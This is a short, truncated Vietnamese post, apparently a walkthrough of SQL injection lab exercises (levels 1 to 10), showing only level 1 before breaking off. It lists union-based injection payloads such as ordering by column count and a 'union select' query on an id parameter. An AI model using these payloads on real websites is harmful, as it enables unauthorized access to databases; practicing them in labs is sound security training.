Khám phá các cấp độ tấn công SQL Injection từ 1 đến 10
Bảng điều khiển bài tập
Nhấn vào cấp độ tương ứng để bắt đầu thử thách
Cấp độ 1: Truy vấn kết hợp
Khi truy cập trang web, người dùng nhập tham số id. Thử với id=1 cho thấy tồn tại lỗ hổng SQL Injection.
?id=1' order by 3--+
?id=1' order by 4--+
Thực hiện truy vấn kết hợp:
?id=-1' union select 1,2,3 --+
Cấp độ 2 (Loại số)
Kiểm tra số lượ ...
Đăng vào ngày 19 tháng 8 lúc 12:31